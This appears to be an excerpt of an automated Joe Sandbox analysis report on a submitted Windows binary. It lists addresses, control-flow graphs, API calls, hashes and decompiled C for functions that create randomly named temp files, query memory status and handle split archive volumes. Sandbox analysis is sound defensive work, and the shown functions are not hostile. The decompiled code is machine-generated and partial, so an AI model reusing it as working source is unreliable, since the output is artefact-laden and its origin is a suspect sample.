                                                                                                                            0x00419199
                                                                                                                            0x0041919e
                                                                                                                            0x004191a3
                                                                                                                            0x004191a8
                                                                                                                            0x004191c1
                                                                                                                            0x004191c7
                                                                                                                            0x004191cc
                                                                                                                            0x004191d1
                                                                                                                            0x004191de
                                                                                                                            0x004191e0
                                                                                                                            0x004191e6
                                                                                                                            0x00419222
                                                                                                                            0x00419222
                                                                                                                            0x00419225
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00419227
                                                                                                                            0x00419228
                                                                                                                            0x00419228
                                                                                                                            0x004191e8
                                                                                                                            0x004191e8
                                                                                                                            0x004191e8
                                                                                                                            0x004191e9
                                                                                                                            0x004191ec
                                                                                                                            0x004191ee
                                                                                                                            0x004191f9
                                                                                                                            0x004191fb
                                                                                                                            0x004191fb
                                                                                                                            0x004191fc
                                                                                                                            0x004191fc
                                                                                                                            0x004191f9
                                                                                                                            0x004191ff
                                                                                                                            0x004191ff
                                                                                                                            0x00419203
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00419209
                                                                                                                            0x00419210
                                                                                                                            0x00419216
                                                                                                                            0x0041921a
                                                                                                                            0x0041922f
                                                                                                                            0x0041921c
                                                                                                                            0x0041921c
                                                                                                                            0x0041921c
                                                                                                                            0x0041923b
                                                                                                                            0x00419240
                                                                                                                            0x00419244
                                                                                                                            0x0041924a
                                                                                                                            0x0041924f
                                                                                                                            0x00419251
                                                                                                                            0x00419254
                                                                                                                            0x00419255
                                                                                                                            0x00419256
                                                                                                                            0x0041925d

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 801014965-0
                                                                                                                            • Opcode ID: 953566137ff324d2cc08c920b6bee47bf00e17c29684309f18a3ad35c9c7aab9
                                                                                                                            • Instruction ID: 00b1766c458623f5937beb69801fb3c22a2eab9a989783d6d676752ba79aceb1
                                                                                                                            • Opcode Fuzzy Hash: 953566137ff324d2cc08c920b6bee47bf00e17c29684309f18a3ad35c9c7aab9
                                                                                                                            • Instruction Fuzzy Hash: 7041AD71940358BFDB24CFA4DC99AEA7BB8EB09710F20456FE852933A1D7384C81CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040492E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98threadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 389 40492e-40495d GetCurrentThreadId GetTickCount GetCurrentProcessId 390 404961-40496d call 40376e 389->390 393 4049c0-4049c6 390->393 394 40496f-404971 390->394 396 4049d4-4049dd call 4051ae 393->396 397 4049c8-4049cf call 4039d8 393->397 395 404973-40497e 394->395 400 404980-404983 395->400 401 404985 395->401 404 4049ec-4049f1 396->404 405 4049df-4049ea SetLastError 396->405 397->396 403 404988-404990 400->403 401->403 403->395 406 404992-40499b 403->406 408 4049f3-4049fd call 405489 404->408 409 4049ff-404a01 call 40447d 404->409 407 404a1c-404a23 405->407 410 4049a6-4049b9 call 4039d8 GetTickCount 406->410 411 40499d-4049a1 call 401ef8 406->411 407->390 416 404a29-404a33 407->416 419 404a06-404a08 408->419 409->419 423 4049bb-4049bd 410->423 424 4049be 410->424 411->410 417 404a35-404a39 416->417 421 404a0a-404a13 GetLastError 419->421 422 404a3c-404a3e 419->422 421->407 425 404a15-404a1a 421->425 422->417 423->424 424->393 425->407 425->416
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040492E(intOrPtr __ecx, void* __edx, signed short** _a4, signed char _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v28;
				void* __ebp;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				void* _t25;
				signed char _t26;
				long _t28;
				signed int _t34;
				signed char _t35;
				void* _t40;
				void* _t42;
				void* _t49;
				unsigned int _t53;
				signed short** _t54;
				unsigned int _t59;
				void* _t60;

				_t42 = __edx;
				_v12 = __ecx;
				_t21 = GetCurrentThreadId();
				_t22 = GetTickCount();
				_t23 = GetCurrentProcessId();
				_t54 = _a4;
				_t59 = (_t21 << 0x00000002 ^ _t22) << 0x0000000c ^ _t23;
				_v8 = _v8 & 0x00000000;
				do {
					E0040376E(_t54, _v12);
					if(_t42 == 0) {
						L12:
						_t69 = _a8;
						_t42 = 1;
						if(_a8 != 0) {
							E004039D8(_t54, ".tmp");
						}
						_t25 = E004051AE( *_t54, _t69); // executed
						if(_t25 == 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								_t26 = E0040447D( *_t54);
							} else {
								_t26 = E00405489( *_t54, 0);
							}
							__eflags = _t26;
							if(_t26 != 0) {
								return 1;
							} else {
								_t28 = GetLastError();
								__eflags = _t28 - 0x50;
								if(_t28 == 0x50) {
									goto L22;
								}
								__eflags = _t28 - 0xb7;
								if(_t28 != 0xb7) {
									break;
								}
								goto L22;
							}
						} else {
							SetLastError(0xb7);
							goto L22;
						}
					}
					_t53 = _t59;
					_t49 = 0;
					do {
						_t34 = _t53 & 0x0000000f;
						_t53 = _t53 >> 4;
						if(_t34 >= 0xa) {
							_t35 = _t34 + 0x37;
							__eflags = _t35;
						} else {
							_t35 = _t34 + 0x30;
						}
						 *(_t60 + _t49 - 0x18) = _t35;
						_t49 = _t49 + 1;
					} while (_t49 < 8);
					 *(_t60 + _t49 - 0x18) =  *(_t60 + _t49 - 0x18) & 0x00000000;
					if(_a8 != 0) {
						E00401EF8(_t54, 0x2e);
					}
					E004039D8(_t54,  &_v28);
					_t40 = GetTickCount() + 2;
					if(_t40 == 0) {
						_t40 = 1;
					}
					_t59 = _t59 + _t40;
					goto L12;
					L22:
					_v8 = _v8 + 1;
				} while (_v8 < 0x64);
				_t54[1] = _t54[1] & 0x00000000;
				 *( *_t54) =  *( *_t54) & 0x00000000;
				return 0;
			}






















                                                                                                                            0x00404937
                                                                                                                            0x00404939
                                                                                                                            0x0040493c
                                                                                                                            0x00404947
                                                                                                                            0x00404952
                                                                                                                            0x00404958
                                                                                                                            0x0040495b
                                                                                                                            0x0040495d
                                                                                                                            0x00404961
                                                                                                                            0x00404966
                                                                                                                            0x0040496d
                                                                                                                            0x004049c0
                                                                                                                            0x004049c0
                                                                                                                            0x004049c4
                                                                                                                            0x004049c6
                                                                                                                            0x004049cf
                                                                                                                            0x004049cf
                                                                                                                            0x004049d6
                                                                                                                            0x004049dd
                                                                                                                            0x004049ef
                                                                                                                            0x004049f1
                                                                                                                            0x00404a01
                                                                                                                            0x004049f3
                                                                                                                            0x004049f8
                                                                                                                            0x004049f8
                                                                                                                            0x00404a06
                                                                                                                            0x00404a08
                                                                                                                            0x00000000
                                                                                                                            0x00404a0a
                                                                                                                            0x00404a0a
                                                                                                                            0x00404a10
                                                                                                                            0x00404a13
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404a15
                                                                                                                            0x00404a1a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404a1a
                                                                                                                            0x004049df
                                                                                                                            0x004049e4
                                                                                                                            0x00000000
                                                                                                                            0x004049e4
                                                                                                                            0x004049dd
                                                                                                                            0x0040496f
                                                                                                                            0x00404971
                                                                                                                            0x00404973
                                                                                                                            0x00404975
                                                                                                                            0x00404978
                                                                                                                            0x0040497e
                                                                                                                            0x00404985
                                                                                                                            0x00404985
                                                                                                                            0x00404980
                                                                                                                            0x00404980
                                                                                                                            0x00404980
                                                                                                                            0x00404988
                                                                                                                            0x0040498c
                                                                                                                            0x0040498d
                                                                                                                            0x00404992
                                                                                                                            0x0040499b
                                                                                                                            0x004049a1
                                                                                                                            0x004049a1
                                                                                                                            0x004049ac
                                                                                                                            0x004049b8
                                                                                                                            0x004049b9
                                                                                                                            0x004049bd
                                                                                                                            0x004049bd
                                                                                                                            0x004049be
                                                                                                                            0x00000000
                                                                                                                            0x00404a1c
                                                                                                                            0x00404a1c
                                                                                                                            0x00404a1f
                                                                                                                            0x00404a2b
                                                                                                                            0x00404a2f
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0040493C
                                                                                                                            • GetTickCount.KERNEL32 ref: 00404947
                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00404A99,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000), ref: 00404952
                                                                                                                            • GetTickCount.KERNEL32 ref: 004049B1
                                                                                                                            • SetLastError.KERNEL32(000000B7,00000000,?,00000000,00404A99,?,00000000), ref: 004049E4
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00404A99,?,00000000), ref: 00404A0A
                                                                                                                              • Part of subcall function 0040447D: CreateDirectoryW.KERNELBASE(00000000,00000000,00404A06,00000000,?,00000000,00404A99,?,00000000), ref: 00404480
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThread
                                                                                                                            • String ID: .tmp$d
                                                                                                                            • API String ID: 3074393274-2797371523
                                                                                                                            • Opcode ID: f19ce56c7826e0bf107473bc8c697ce6a70b0feafaf69e5a630db6a82c9332e3
                                                                                                                            • Instruction ID: 18cd839078860563eabca9c9166aecfd8bb13a7da93ccbaeff0eff10b9c7e743
                                                                                                                            • Opcode Fuzzy Hash: f19ce56c7826e0bf107473bc8c697ce6a70b0feafaf69e5a630db6a82c9332e3
                                                                                                                            • Instruction Fuzzy Hash: D331EDF2A402049BDB14ABB4D84A7AF7B65ABD1319F14413BEA42B72C1D73C8C418B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406018 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 47libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 426 406018-40604b GetModuleHandleW GetProcAddress 427 406078-40608f GlobalMemoryStatus 426->427 428 40604d-406055 GlobalMemoryStatusEx 426->428 430 406091 427->430 431 406094-406096 427->431 428->427 429 406057-406060 428->429 432 406062 429->432 433 40606e 429->433 430->431 434 40609a-40609e 431->434 435 406064-406067 432->435 436 406069-40606c 432->436 437 406071-406076 433->437 435->433 435->436 436->437 437->434
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00406018(intOrPtr* __ecx) {
				struct _MEMORYSTATUS _v36;
				signed int _v56;
				intOrPtr _v60;
				struct _MEMORYSTATUSEX _v100;
				_Unknown_base(*)()* _t20;
				intOrPtr _t22;
				intOrPtr _t24;
				signed int _t27;
				intOrPtr* _t28;
				void* _t31;

				_t28 = __ecx;
				 *__ecx = 0x80000000;
				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
				_v100.dwLength = 0x40;
				_t20 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GlobalMemoryStatusEx");
				if(_t20 == 0) {
					L8:
					_v36.dwLength = 0x20;
					GlobalMemoryStatus( &_v36);
					_t22 = _v36.dwTotalVirtual;
					if(_t22 >= _v36.dwTotalPhys) {
						_t22 = _v36.dwTotalPhys;
					}
					 *_t28 = _t22;
					 *(_t28 + 4) =  *(_t28 + 4) & 0x00000000;
				} else {
					GlobalMemoryStatusEx( &_v100); // executed
					if(_t20 == 0) {
						goto L8;
					} else {
						_t27 = _v56;
						_t24 = _v100.ullTotalPhys;
						_t31 = _t27 - _v100.ullAvailPhys;
						if(_t31 > 0 || _t31 >= 0 && _v60 >= _t24) {
							_t27 = _v100.ullAvailPhys;
						} else {
							_t24 = _v60;
						}
						 *_t28 = _t24;
						 *(_t28 + 4) = _t27;
					}
				}
				return 1;
			}













                                                                                                                            0x0040601f
                                                                                                                            0x0040602b
                                                                                                                            0x00406031
                                                                                                                            0x00406035
                                                                                                                            0x00406043
                                                                                                                            0x0040604b
                                                                                                                            0x00406078
                                                                                                                            0x0040607b
                                                                                                                            0x00406083
                                                                                                                            0x00406089
                                                                                                                            0x0040608f
                                                                                                                            0x00406091
                                                                                                                            0x00406091
                                                                                                                            0x00406094
                                                                                                                            0x00406096
                                                                                                                            0x0040604d
                                                                                                                            0x00406051
                                                                                                                            0x00406055
                                                                                                                            0x00000000
                                                                                                                            0x00406057
                                                                                                                            0x00406057
                                                                                                                            0x0040605a
                                                                                                                            0x0040605d
                                                                                                                            0x00406060
                                                                                                                            0x0040606e
                                                                                                                            0x00406069
                                                                                                                            0x00406069
                                                                                                                            0x00406069
                                                                                                                            0x00406071
                                                                                                                            0x00406073
                                                                                                                            0x00406073
                                                                                                                            0x00406055
                                                                                                                            0x0040609e

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040603C
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406043
                                                                                                                            • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00406051
                                                                                                                            • GlobalMemoryStatus.KERNEL32 ref: 00406083
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                                                                                                                            • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                            • API String ID: 180289352-802862622
                                                                                                                            • Opcode ID: 3e885fa00bb47ba29b610c8aff3464296625ee5c326c36c9750f9013a6749dc4
                                                                                                                            • Instruction ID: 6939841f741f7d36a15a20a0e3427741af3cfa69e4de5986cbad5950b484ded2
                                                                                                                            • Opcode Fuzzy Hash: 3e885fa00bb47ba29b610c8aff3464296625ee5c326c36c9750f9013a6749dc4
                                                                                                                            • Instruction Fuzzy Hash: A9115B749403099BDF10DFA4C949BAEBBF5EB04705F11442EE546B7280D778A894CBA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A53F Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 260COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 438 40a53f-40a569 call 418d80 441 40a598-40a59b 438->441 442 40a56b-40a575 call 4031dd 438->442 444 40a5a1-40a5b2 call 4031dd 441->444 445 40a633-40a636 call 40a2c8 441->445 451 40a582 442->451 452 40a577-40a580 442->452 453 40a5c0 444->453 454 40a5b4-40a5be call 4065b9 444->454 450 40a63b-40a647 445->450 455 40a81d-40a826 450->455 456 40a64d-40a651 450->456 457 40a584-40a593 call 4063e5 451->457 452->457 459 40a5c3-40a5f3 call 4063e5 call 4037d2 call 4053b3 453->459 454->459 462 40a828-40a82a 455->462 463 40a82e-40a837 455->463 456->455 460 40a657-40a65b 456->460 457->445 488 40a5f5-40a606 GetLastError 459->488 489 40a626-40a62c 459->489 460->455 468 40a661-40a665 460->468 462->463 464 40a839-40a83b 463->464 465 40a83f 463->465 464->465 470 40a841-40a84f 465->470 472 40a670-40a679 468->472 473 40a667-40a66a 468->473 475 40a7be-40a7c7 472->475 476 40a67f-40a69b call 4032ce 472->476 473->455 473->472 478 40a7c9-40a7cb 475->478 479 40a7cf-40a7d8 475->479 476->475 486 40a6a1-40a6c4 call 409111 476->486 478->479 482 40a7e0-40a7e3 479->482 483 40a7da-40a7dc 479->483 482->470 483->482 495 40a7b5-40a7bd call 403204 486->495 496 40a6ca-40a6e2 call 4032ce 486->496 491 40a608-40a60a 488->491 492 40a60e-40a617 488->492 489->445 491->492 493 40a619-40a61b 492->493 494 40a61f-40a621 492->494 493->494 494->470 495->475 501 40a7a4-40a7af 496->501 502 40a6e8-40a74d call 403740 call 401ef8 call 40a8b7 call 40399c call 403204 call 4037d2 call 4039d8 call 40a891 496->502 501->495 501->496 519 40a768-40a777 call 4053b3 502->519 520 40a74f-40a766 call 4037d2 call 40a891 502->520 526 40a797-40a7a3 call 403204 519->526 527 40a779-40a795 call 409944 call 40a2c8 519->527 520->519 520->526 526->501 527->526 535 40a7e5-40a800 call 403204 * 2 527->535 540 40a802-40a804 535->540 541 40a808-40a811 535->541 540->541 542 40a813-40a815 541->542 543 40a819-40a81b 541->543 542->543 543->470
                                                                                                                            C-Code - Quality: 87%
                                                                                                                            			E0040A53F(void* __ecx) {
				signed char _t119;
				signed int _t120;
				signed int _t121;
				signed char _t122;
				signed int _t126;
				signed int _t127;
				void* _t136;
				void* _t139;
				void* _t144;
				void* _t145;
				void* _t150;
				signed int _t158;
				signed int _t159;
				signed int _t164;
				signed int _t170;
				long _t172;
				signed int _t173;
				signed int _t174;
				intOrPtr* _t178;
				signed char _t183;
				void* _t185;
				signed int _t233;
				void* _t236;
				signed char _t238;
				void* _t239;

				E00418D80(E00419E42, _t239);
				_t236 = __ecx;
				 *(_t239 - 0x10) = 0;
				 *(_t239 - 4) = 0;
				 *(_t239 - 0x14) = 0;
				_t233 =  *(_t239 + 8);
				 *(_t239 - 4) = 1;
				 *(_t239 - 0x18) = 0;
				if( *((intOrPtr*)(_t233 + 0x40)) == 0) {
					__eflags =  *(_t233 + 0x30);
					if( *(_t233 + 0x30) != 0) {
						goto L16;
					} else {
						_push(0x24);
						_t164 = E004031DD();
						 *(_t239 + 8) = _t164;
						__eflags = _t164;
						 *(_t239 - 4) = 2;
						if(_t164 == 0) {
							 *(_t239 + 8) = 0;
						} else {
							 *(_t239 + 8) = E004065B9(_t164);
						}
						 *(_t239 - 4) = 1;
						 *(_t239 - 0x18) =  *(_t239 + 8);
						E004063E5(_t239 - 0x10,  *(_t239 + 8));
						E004037D2(_t236 + 0x70, _t236 + 0x7c);
						_t170 = E004053B3( *((intOrPtr*)(_t236 + 0x70)));
						__eflags = _t170;
						if(_t170 != 0) {
							 *(_t233 + 0x30) =  *(_t239 - 0x10);
							 *(_t236 + 0xdf) = 1;
							goto L16;
						} else {
							_t172 = GetLastError();
							 *(_t239 - 4) =  *(_t239 - 4) & 0x00000000;
							_t238 = _t172;
							_t173 =  *(_t239 - 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								 *((intOrPtr*)( *_t173 + 8))(_t173);
							}
							_t174 =  *(_t239 - 0x10);
							 *(_t239 - 4) =  *(_t239 - 4) | 0xffffffff;
							__eflags = _t174;
							if(_t174 != 0) {
								 *((intOrPtr*)( *_t174 + 8))(_t174);
							}
							_t122 = _t238;
						}
					}
				} else {
					_push(8);
					_t178 = E004031DD();
					if(_t178 == 0) {
						_t178 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t178 + 4)) = 0;
						 *_t178 = 0x41bb0c;
					}
					E004063E5(_t239 - 0x14, _t178);
					 *(_t233 + 0x34) =  *(_t239 - 0x14);
					L16:
					_push(_t233);
					_t119 = E0040A2C8(_t236); // executed
					 *(_t236 + 0xdf) =  *(_t236 + 0xdf) & 0x00000000;
					_t183 = _t119;
					if(_t183 != 1 ||  *(_t239 - 0x18) == 0 ||  *((intOrPtr*)(_t233 + 0x3c)) == 0 ||  *((char*)(_t236 + 0x43)) != 0 && ( *(_t236 + 0x44) & _t119) == 0) {
						_t120 =  *(_t239 - 0x14);
						 *(_t239 - 4) =  *(_t239 - 4) & 0x00000000;
						__eflags = _t120;
						if(_t120 != 0) {
							 *((intOrPtr*)( *_t120 + 8))(_t120);
						}
						_t121 =  *(_t239 - 0x10);
						 *(_t239 - 4) =  *(_t239 - 4) | 0xffffffff;
						__eflags = _t121;
						if(_t121 != 0) {
							 *((intOrPtr*)( *_t121 + 8))(_t121);
						}
						_t122 = _t183;
					} else {
						if( *(_t236 + 0x80) <= 4) {
							L32:
							_t126 =  *(_t239 - 0x14);
							 *(_t239 - 4) =  *(_t239 - 4) & 0x00000000;
							if(_t126 != 0) {
								 *((intOrPtr*)( *_t126 + 8))(_t126);
							}
							_t127 =  *(_t239 - 0x10);
							 *(_t239 - 4) =  *(_t239 - 4) | 0xffffffff;
							if(_t127 != 0) {
								 *((intOrPtr*)( *_t127 + 8))(_t127);
							}
							_t122 = 1;
						} else {
							_t185 = _t236 + 0x7c;
							if(E004032CE( *((intOrPtr*)(_t236 + 0x7c)) +  *(_t236 + 0x80) * 2 - 8, ".exe") == 0) {
								goto L32;
							} else {
								E00409111(_t185, _t239 - 0x30,  *(_t236 + 0x80) + 0xfffffffc);
								_t136 =  *_t233;
								 *(_t239 + 8) =  *(_t239 + 8) & 0x00000000;
								 *(_t239 - 4) = 3;
								if( *((intOrPtr*)(_t136 + 0xc)) <= 0) {
									L31:
									E00403204(_t136,  *((intOrPtr*)(_t239 - 0x30)));
									goto L32;
								} else {
									do {
										_t186 =  *((intOrPtr*)( *((intOrPtr*)(_t136 + 8)) +  *(_t239 + 8) * 4));
										_t139 = E004032CE( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t136 + 8)) +  *(_t239 + 8) * 4)) + 0xc)), "Split");
										_t254 = _t139;
										if(_t139 != 0) {
											goto L30;
										} else {
											E00403740(_t239 - 0x24, _t254, _t239 - 0x30);
											 *(_t239 - 4) = 4;
											E00401EF8(_t239 - 0x24, 0x2e);
											_t144 = E0040A8B7(_t186, _t239 - 0x3c);
											 *(_t239 - 4) = 5;
											_t145 = E0040399C(_t239 - 0x24, _t254, _t144);
											 *(_t239 - 4) = 4;
											E00403204(_t145,  *((intOrPtr*)(_t239 - 0x3c)));
											_t187 = _t236 + 0x70;
											E004037D2(_t236 + 0x70, _t239 - 0x24);
											E004039D8(_t236 + 0x70, ".001");
											_t150 = E0040A891( *((intOrPtr*)(_t233 + 0x3c)), _t254,  *(_t236 + 0x70));
											_t255 = _t150;
											if(_t150 != 0) {
												L27:
												if(E004053B3( *_t187) == 0) {
													goto L29;
												} else {
													 *(_t233 + 0x30) =  *(_t239 - 0x10);
													 *(_t236 + 0x4c) =  *(_t236 + 0x4c) | 0xffffffff;
													E00409944(_t236 + 0x40);
													_push(_t233);
													if(E0040A2C8(_t236) == 0) {
														E00403204(E00403204(_t152,  *((intOrPtr*)(_t239 - 0x24))),  *((intOrPtr*)(_t239 - 0x30)));
														_t158 =  *(_t239 - 0x14);
														 *(_t239 - 4) =  *(_t239 - 4) & 0x00000000;
														__eflags = _t158;
														if(_t158 != 0) {
															 *((intOrPtr*)( *_t158 + 8))(_t158);
														}
														_t159 =  *(_t239 - 0x10);
														 *(_t239 - 4) =  *(_t239 - 4) | 0xffffffff;
														__eflags = _t159;
														if(_t159 != 0) {
															 *((intOrPtr*)( *_t159 + 8))(_t159);
														}
														_t122 = 0;
													} else {
														goto L29;
													}
												}
											} else {
												E004037D2(_t187, _t239 - 0x24);
												if(E0040A891( *((intOrPtr*)(_t233 + 0x3c)), _t255,  *_t187) == 0) {
													L29:
													 *(_t239 - 4) = 3;
													E00403204(_t152,  *((intOrPtr*)(_t239 - 0x24)));
													goto L30;
												} else {
													goto L27;
												}
											}
										}
										goto L47;
										L30:
										 *(_t239 + 8) =  *(_t239 + 8) + 1;
										_t136 =  *_t233;
									} while ( *(_t239 + 8) <  *((intOrPtr*)(_t136 + 0xc)));
									goto L31;
								}
							}
						}
					}
				}
				L47:
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return _t122;
			}




























                                                                                                                            0x0040a544
                                                                                                                            0x0040a551
                                                                                                                            0x0040a553
                                                                                                                            0x0040a556
                                                                                                                            0x0040a559
                                                                                                                            0x0040a55c
                                                                                                                            0x0040a55f
                                                                                                                            0x0040a563
                                                                                                                            0x0040a569
                                                                                                                            0x0040a598
                                                                                                                            0x0040a59b
                                                                                                                            0x00000000
                                                                                                                            0x0040a5a1
                                                                                                                            0x0040a5a1
                                                                                                                            0x0040a5a3
                                                                                                                            0x0040a5a9
                                                                                                                            0x0040a5ac
                                                                                                                            0x0040a5ae
                                                                                                                            0x0040a5b2
                                                                                                                            0x0040a5c0
                                                                                                                            0x0040a5b4
                                                                                                                            0x0040a5bb
                                                                                                                            0x0040a5bb
                                                                                                                            0x0040a5ca
                                                                                                                            0x0040a5ce
                                                                                                                            0x0040a5d1
                                                                                                                            0x0040a5df
                                                                                                                            0x0040a5ec
                                                                                                                            0x0040a5f1
                                                                                                                            0x0040a5f3
                                                                                                                            0x0040a629
                                                                                                                            0x0040a62c
                                                                                                                            0x00000000
                                                                                                                            0x0040a5f5
                                                                                                                            0x0040a5f5
                                                                                                                            0x0040a5fb
                                                                                                                            0x0040a5ff
                                                                                                                            0x0040a601
                                                                                                                            0x0040a604
                                                                                                                            0x0040a606
                                                                                                                            0x0040a60b
                                                                                                                            0x0040a60b
                                                                                                                            0x0040a60e
                                                                                                                            0x0040a611
                                                                                                                            0x0040a615
                                                                                                                            0x0040a617
                                                                                                                            0x0040a61c
                                                                                                                            0x0040a61c
                                                                                                                            0x0040a61f
                                                                                                                            0x0040a61f
                                                                                                                            0x0040a5f3
                                                                                                                            0x0040a56b
                                                                                                                            0x0040a56b
                                                                                                                            0x0040a56d
                                                                                                                            0x0040a575
                                                                                                                            0x0040a582
                                                                                                                            0x0040a582
                                                                                                                            0x0040a577
                                                                                                                            0x0040a577
                                                                                                                            0x0040a57a
                                                                                                                            0x0040a57a
                                                                                                                            0x0040a588
                                                                                                                            0x0040a590
                                                                                                                            0x0040a633
                                                                                                                            0x0040a633
                                                                                                                            0x0040a636
                                                                                                                            0x0040a63b
                                                                                                                            0x0040a642
                                                                                                                            0x0040a647
                                                                                                                            0x0040a81d
                                                                                                                            0x0040a820
                                                                                                                            0x0040a824
                                                                                                                            0x0040a826
                                                                                                                            0x0040a82b
                                                                                                                            0x0040a82b
                                                                                                                            0x0040a82e
                                                                                                                            0x0040a831
                                                                                                                            0x0040a835
                                                                                                                            0x0040a837
                                                                                                                            0x0040a83c
                                                                                                                            0x0040a83c
                                                                                                                            0x0040a83f
                                                                                                                            0x0040a670
                                                                                                                            0x0040a679
                                                                                                                            0x0040a7be
                                                                                                                            0x0040a7be
                                                                                                                            0x0040a7c1
                                                                                                                            0x0040a7c7
                                                                                                                            0x0040a7cc
                                                                                                                            0x0040a7cc
                                                                                                                            0x0040a7cf
                                                                                                                            0x0040a7d2
                                                                                                                            0x0040a7d8
                                                                                                                            0x0040a7dd
                                                                                                                            0x0040a7dd
                                                                                                                            0x0040a7e2
                                                                                                                            0x0040a67f
                                                                                                                            0x0040a688
                                                                                                                            0x0040a69b
                                                                                                                            0x00000000
                                                                                                                            0x0040a6a1
                                                                                                                            0x0040a6b1
                                                                                                                            0x0040a6b6
                                                                                                                            0x0040a6b8
                                                                                                                            0x0040a6bc
                                                                                                                            0x0040a6c4
                                                                                                                            0x0040a7b5
                                                                                                                            0x0040a7b8
                                                                                                                            0x00000000
                                                                                                                            0x0040a6ca
                                                                                                                            0x0040a6ca
                                                                                                                            0x0040a6d5
                                                                                                                            0x0040a6db
                                                                                                                            0x0040a6e0
                                                                                                                            0x0040a6e2
                                                                                                                            0x00000000
                                                                                                                            0x0040a6e8
                                                                                                                            0x0040a6ef
                                                                                                                            0x0040a6f9
                                                                                                                            0x0040a6fd
                                                                                                                            0x0040a708
                                                                                                                            0x0040a711
                                                                                                                            0x0040a715
                                                                                                                            0x0040a71d
                                                                                                                            0x0040a721
                                                                                                                            0x0040a727
                                                                                                                            0x0040a730
                                                                                                                            0x0040a73c
                                                                                                                            0x0040a746
